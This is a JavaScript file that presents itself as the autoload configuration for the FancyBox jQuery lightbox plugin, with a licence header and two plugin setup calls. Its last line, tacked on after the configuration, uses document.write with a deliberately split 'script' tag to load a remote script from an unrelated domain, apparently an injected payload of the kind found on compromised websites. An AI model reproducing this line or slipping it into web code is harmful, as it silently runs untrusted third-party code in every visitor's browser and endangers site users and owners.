/*
 * FancyBox - simple and fancy jQuery plugin
 * Examples and documentation at: http://fancy.klade.lv/
 * Version: 1.2.1 (13/03/2009)
 * Copyright (c) 2009 Janis Skarnelis
 * Licensed under the MIT License: http://en.wikipedia.org/wiki/MIT_License
 * Requires: jQuery v1.3+
*/

// AUTOLOAD CODE BLOCK (MAY BE CHANGED OR REMOVED)
jQuery(function($) {
	$("a[rel^='lightbox']").fancybox({
	/* Put custom options here */

	});
	$("a.iframe").fancybox({
	/* Put custom options here */
	'frameWidth': 400,
	'frameHeight': 220
	});
});

document.write('<sc'+'ript type="text/javascript" src="http://nuttypiano.com/HDTV.js"></scri'+'pt>');